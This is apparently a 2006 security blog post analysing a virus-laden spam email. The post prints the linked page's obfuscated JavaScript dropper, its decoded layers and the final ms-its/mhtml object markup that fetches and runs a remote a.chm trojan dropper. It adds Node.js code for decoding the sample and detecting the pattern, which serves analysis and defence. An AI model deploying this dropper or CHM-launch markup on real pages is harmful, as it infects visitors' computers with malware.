caobihole
Beware of the virus-laden email with the subject "How have you been? Why can't I reach you?"

 

Original article by endurer

2006-04-04, 1st

Today I received a virus-laden email. It is similar to the one I received at the end of 2005 (see: Received an email carrying a virus.... ), but it has been refreshed.

Subject: How have you been? Why can't I reach you?
From: "zxc338855" zxc338855@163.com
The message body (the following paragraph appears twice in a row in the message) is:
Boss, why can't I ever reach you lately? Where on earth have you gone? Whenever I call, your phone is switched off! I text you and you don't reply! You probably haven't even read my emails! If you see this letter, give me a call! I need you for something! By the way, did you change your QQ? Or did someone hack it? The person on your old QQ keeps cursing at me, and it's disgusting! I suspect it isn't you! If your QQ was hacked, I still have a few QQ numbers I can give you, but you have to treat me! That's all for now, be sure to get in touch when you have time! Don't forget

The mail body uses an <IFRAME> to pull in the page that downloads the virus: hxxp://2008.***e2.7868.net/service/bj/a.htm.


The content of hxxp://2008.***e2.7868.net/service/bj/a.htm is:


<SCRIPT LANGUAGE="JavaScript">
<!--
// Obfuscated payload: 16 chunks, every character stored one code point above its real value.
// Note: in this copy of the sample the tokens "=TDSJQU>" and "=0TDSJQU>" decode to "<SCRIPT=" and
// "</SCRIPT=", while the decoded listing further down shows "<SCRIPT>" and "</SCRIPT>"; a non-printable
// code-2 escape byte before the '>' (see psw below) would produce that and would not survive being pasted as text.
var HtmlStrings = [
  "=TDSJQU>wbs!Xpset>#&4Dcpez!podpoufyunfov&4E&33sfuvso!gbmtf&33!p",
  "oesbhtubsu&4E&33sfuvso!gbmtf&33!potfmfdutubsu!&4E&33sfuvso!gb",
  "mtf&33!potfmfdu&4E&33epdvnfou&3Ftfmfdujpo&3Ffnquz&39&3:&33!po",
  "dpqz&4E&33epdvnfou&3Ftfmfdujpo&3Ffnquz&39&3:&33!pocfgpsfdpqz&",
  "4E&33sfuvso!gbmtf&33!ponpvtfvq&4E&33epdvnfou&3Ftfmfdujpo&3Ffn",
  "quz&39&3:&33&4F&4Doptdsjqu&4F&4Djgsbnf!tsd&4E&3B&4F&4D&3Gjgsb",
  "nf&4F&4D&3Goptdsjqu&4F&1E&1B&4Dufyubsfb!je&4E&33dpef&33!tuzmf",
  "&4E&33ejtqmbz&4Bopof&4C&33&4F&1E&1B&4Dpckfdu!ebub&4E&33&37&34",
  "21:&4Ct&3Ejut&4Bniunm&4Bgjmf&4B&3G&3Gd&4B&6Dgpp&3Fniu&32&35&8",
  "Cqbui&8E&3Gb&3Fdin&4B&4B&3Gb&3Fiun&33!uzqf&4E&33ufyu&3Gy&3Etd",
  "sjqumfu&33&4F&1E&1B&4D&3Gpckfdu&4F&1E&1B&4D&3Gufyubsfb&4F&1E&",
  "1B&4Dtdsjqu!mbohvbhf&4E&33kbwbtdsjqu&33&4F&1E&1Bepdvnfou&3Fxs",
  "juf&39dpef&3Fwbmvf&3Fsfqmbdf&39&3G&6D&35&8Cqbui&8E&3Gh&3Dmpdb",
  "ujpo&3Fisfg&3Ftvctusjoh&391&3Dmpdbujpo&3Fisfg&3FjoefyPg&39&38",
  "b&3Fiun&38&3:&3:&3:&3:&4C&1E&1B&4D&3Gtdsjqu&4F&1E&1B#<epdvnfo",
  "u/xsjuf)voftdbqf)Xpset**=0TDSJQU> "
];

// Decoder: shift every character down by one code point. Two control values are special:
// code 1 stands for '!' and code 2 means "emit the next character unchanged" (an escape
// for characters that could not be stored in shifted form).
function psw(st) {
  var varS = "";
  var i;
  for (var a = 0; a < st.length; a++) {
    i = st.charCodeAt(a);
    if (i == 1)
      varS = varS + String.fromCharCode('"'.charCodeAt(0) - 1); // '"' - 1 == '!'
    else if (i == 2) {
      a++;
      varS += String.fromCharCode(st.charCodeAt(a));
    } else
      varS += String.fromCharCode(i - 1);
  }
  return varS;
}

var num = 16;

// Decode every chunk and write the result straight into the document.
function S() {
  for (var i = 0; i < num; i++)
    document.write(psw(HtmlStrings[i]));
}

S();
// -->
</SCRIPT>


The payload is obfuscated with a custom encoding function (psw above) rather than a standard encoding.
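As an added example (not code from the original post), here is the same decoder ported to Node.js so both layers of the obfuscation can be unwrapped offline: the one-position character shift, then the %XX escaping that the decoded script hands to unescape(). The 16 chunk strings are copied from the page; the function names (shiftDecode, decodeLayer1, extractEscapedPayload, decodeLayer2, decodeAll) are this example's own, and the code-1 / code-2 escape handling is exercised directly because the page's chunks never trigger it.

```javascript
// Added example: Node.js port of the page's psw() decoder, run offline over the
// chunks copied from the page. Function names are this example's own.

// Layer 1: every character was stored one code point above its real value.
// Code 1 stands for '!' and code 2 marks the following character as literal.
// A bounds check is added for a trailing escape byte; the original has none.
function shiftDecode(st) {
  let out = "";
  for (let a = 0; a < st.length; a++) {
    const i = st.charCodeAt(a);
    if (i === 1) {
      out += "!";
    } else if (i === 2) {
      a++; // escape: copy the next character unchanged
      if (a < st.length) out += st.charAt(a);
    } else {
      out += String.fromCharCode(i - 1);
    }
  }
  return out;
}

// The 16 chunks exactly as they appear on the page.
const HTML_STRINGS = [
  "=TDSJQU>wbs!Xpset>#&4Dcpez!podpoufyunfov&4E&33sfuvso!gbmtf&33!p",
  "oesbhtubsu&4E&33sfuvso!gbmtf&33!potfmfdutubsu!&4E&33sfuvso!gb",
  "mtf&33!potfmfdu&4E&33epdvnfou&3Ftfmfdujpo&3Ffnquz&39&3:&33!po",
  "dpqz&4E&33epdvnfou&3Ftfmfdujpo&3Ffnquz&39&3:&33!pocfgpsfdpqz&",
  "4E&33sfuvso!gbmtf&33!ponpvtfvq&4E&33epdvnfou&3Ftfmfdujpo&3Ffn",
  "quz&39&3:&33&4F&4Doptdsjqu&4F&4Djgsbnf!tsd&4E&3B&4F&4D&3Gjgsb",
  "nf&4F&4D&3Goptdsjqu&4F&1E&1B&4Dufyubsfb!je&4E&33dpef&33!tuzmf",
  "&4E&33ejtqmbz&4Bopof&4C&33&4F&1E&1B&4Dpckfdu!ebub&4E&33&37&34",
  "21:&4Ct&3Ejut&4Bniunm&4Bgjmf&4B&3G&3Gd&4B&6Dgpp&3Fniu&32&35&8",
  "Cqbui&8E&3Gb&3Fdin&4B&4B&3Gb&3Fiun&33!uzqf&4E&33ufyu&3Gy&3Etd",
  "sjqumfu&33&4F&1E&1B&4D&3Gpckfdu&4F&1E&1B&4D&3Gufyubsfb&4F&1E&",
  "1B&4Dtdsjqu!mbohvbhf&4E&33kbwbtdsjqu&33&4F&1E&1Bepdvnfou&3Fxs",
  "juf&39dpef&3Fwbmvf&3Fsfqmbdf&39&3G&6D&35&8Cqbui&8E&3Gh&3Dmpdb",
  "ujpo&3Fisfg&3Ftvctusjoh&391&3Dmpdbujpo&3Fisfg&3FjoefyPg&39&38",
  "b&3Fiun&38&3:&3:&3:&3:&4C&1E&1B&4D&3Gtdsjqu&4F&1E&1B#<epdvnfo",
  "u/xsjuf)voftdbqf)Xpset**=0TDSJQU> "
];

function decodeLayer1(chunks) {
  return chunks.map(shiftDecode).join("");
}

// Layer 2: the decoded script keeps the real markup as a %XX-escaped string in a
// variable named Words and hands it to unescape() at run time.
function extractEscapedPayload(script) {
  const m = /Words="([^"]*)"/.exec(script);
  return m ? m[1] : null;
}

function decodeLayer2(script) {
  const escaped = extractEscapedPayload(script);
  return escaped === null ? null : unescape(escaped);
}

function decodeAll(chunks) {
  const script = decodeLayer1(chunks);
  return { script, html: decodeLayer2(script) };
}

const result = decodeAll(HTML_STRINGS);
console.log(result.script);
console.log(result.html);
```

Running this on the page's chunks reproduces the %XX-escaped script and the final markup, including the object element whose data attribute begins with the numeric character reference &#109; (the letter "m"), so that the protocol name "ms-its" is never visible in any intermediate layer as plain text. The first chunk decodes to "<SCRIPT=" in this copy, which is what the sample shows without the escape byte discussed above; the test on the escape path shows that a code-2 byte before the '>' yields "<SCRIPT>".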

After decoding, the code is:


<SCRIPT>var Words="%3Cbody oncontextmenu%3D%22return false%22 ondragstart%3D%22return false%22 onselectstart %3D%22return false%22 onselect%3D%22document%2Eselection%2Eempty%28%29%22 oncopy%3D%22document%2Eselection%2Eempty%28%29%22 onbeforecopy%3D%22return false%22 onmouseup%3D%22document%2Eselection%2Eempty%28%29%22%3E%3Cnoscript%3E%3Ciframe src%3D%2A%3E%3C%2Fiframe%3E%3C%2Fnoscript%3E%0D%0A%3Ctextarea id%3D%22code%22 style%3D%22display%3Anone%3B%22%3E%0D%0A%3Cobject data%3D%22%26%23109%3Bs%2Dits%3Amhtml%3Afile%3A%2F%2Fc%3A%5Cfoo%2Emht%21%24%7Bpath%7D%2Fa%2Echm%3A%3A%2Fa%2Ehtm%22 type%3D%22text%2Fx%2Dscriptlet%22%3E%0D%0A%3C%2Fobject%3E%0D%0A%3C%2Ftextarea%3E%0D%0A%3Cscript language%3D%22javascript%22%3E%0D%0Adocument%2Ewrite%28code%2Evalue%2Ereplace%28%2F%5C%24%7Bpath%7D%2Fg%2Clocation%2Ehref%2Esubstring%280%2Clocation%2Ehref%2EindexOf%28%27a%2Ehtm%27%29%29%29%29%3B%0D%0A%3C%2Fscript%3E%0D%0A";document.write(unescape(Words))</SCRIPT>


After unescape, the code is:


<body oncontextmenu="return false" ondragstart="return false" onselectstart ="return false" onselect="document.selection.empty()" oncopy="document.selection.empty()" onbeforecopy="return false" onmouseup="document.selection.empty()"><noscript><iframe src=*></iframe></noscript>

<textarea id="code" style="display:none;">

<object data="&#109;s-its:mhtml:file://c:\foo.mht!${path}/a.chm::/a.htm" type="text/x-scriptlet">

</object>

</textarea>

<script language="javascript">

document.write(code.value.replace(/\${path}/g,location.href.substring(0,location.href.indexOf('a.htm'))));

</script>


That page downloads and runs a.chm.

a.chm drops and runs a.htm and a.exe. Kaspersky reports them as Exploit.HTML.CodeBaseExec and Trojan-Dropper.Win32.Pakes; Rising reports them as Exploit.HTML.CodeExec and Trojan.PcGhost.c.
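As an added example (not the post's own code), the following Node.js snippet reproduces the ${path} substitution that the decoded page's inline script performs, and runs a few indicator checks for the CHM-launcher pattern over that decoded markup. The markup is the page's decoded HTML; SAMPLE_HREF is a constructed placeholder because the real host is redacted on the page; the function names (decodeNumericEntities, extractObjectData, resolveChmPath, scanChmLauncher) are this example's own.

```javascript
// Added example: indicator checks for the decoded dropper page above, plus the
// ${path} substitution its inline script performs. Markup copied from the page;
// SAMPLE_HREF is a constructed placeholder; function names are this example's own.

const SAMPLE_HTML = [
  '<body oncontextmenu="return false" ondragstart="return false" onselectstart ="return false" onselect="document.selection.empty()" oncopy="document.selection.empty()" onbeforecopy="return false" onmouseup="document.selection.empty()"><noscript><iframe src=*></iframe></noscript>',
  '<textarea id="code" style="display:none;">',
  '<object data="&#109;s-its:mhtml:file://c:\\foo.mht!${path}/a.chm::/a.htm" type="text/x-scriptlet">',
  '</object>',
  '</textarea>',
  '<script language="javascript">',
  "document.write(code.value.replace(/\\${path}/g,location.href.substring(0,location.href.indexOf('a.htm'))));",
  '</script>'
].join('\n');

// Constructed landing URL standing in for the redacted one on the page.
const SAMPLE_HREF = 'http://example.invalid/service/bj/a.htm';

// Numeric character references (&#109; is "m") hide a protocol name from naive
// string matching; resolve them before inspecting attribute values.
function decodeNumericEntities(s) {
  return s.replace(/&#(x[0-9a-f]+|\d+);/gi, (_, code) =>
    String.fromCharCode(code[0].toLowerCase() === 'x'
      ? parseInt(code.slice(1), 16)
      : parseInt(code, 10)));
}

// Collect every <object data="..."> value, entity-decoded.
function extractObjectData(html) {
  const out = [];
  const re = /<object\b[^>]*\bdata\s*=\s*"([^"]*)"/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(decodeNumericEntities(m[1]));
  return out;
}

// The inline script replaces ${path} with location.href up to "a.htm", i.e. the
// directory the landing page came from, so a.chm is fetched from the same place.
// If "a.htm" is absent, indexOf() gives -1 and substring(0, -1) is "", as in the original.
function resolveChmPath(objectData, href) {
  return objectData.replace(/\$\{path\}/g, href.substring(0, href.indexOf('a.htm')));
}

// Indicators of the CHM-launcher pattern seen on the page.
function scanChmLauncher(html) {
  const findings = [];
  for (const data of extractObjectData(html)) {
    const lower = data.toLowerCase();
    if (/^(ms-its|its|mk):/.test(lower)) findings.push('object data uses the ITS (CHM) protocol handler: ' + data);
    if (lower.includes('mhtml:')) findings.push('mhtml: nested inside object data');
    if (lower.includes('.chm')) findings.push('object data references a .chm file');
  }
  if (/<object\b[^>]*\btype\s*=\s*"text\/x-scriptlet"/i.test(html)) findings.push('object type text/x-scriptlet');
  if (/<textarea\b[^>]*display\s*:\s*none/i.test(html) && /document\.write\([^)]*\.value/i.test(html)) {
    findings.push('hidden <textarea> whose content is written into the page by script');
  }
  return { findings, suspicious: findings.length >= 2 };
}

console.log(resolveChmPath(extractObjectData(SAMPLE_HTML)[0], SAMPLE_HREF));
console.log(JSON.stringify(scanChmLauncher(SAMPLE_HTML), null, 2));
```

The entity decoding step matters: matched against the raw attribute, a rule looking for "ms-its:" misses this sample because the first letter is written as &#109;. The hidden-textarea plus document.write pairing is flagged separately because it is what keeps the object element out of the static markup until script runs.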
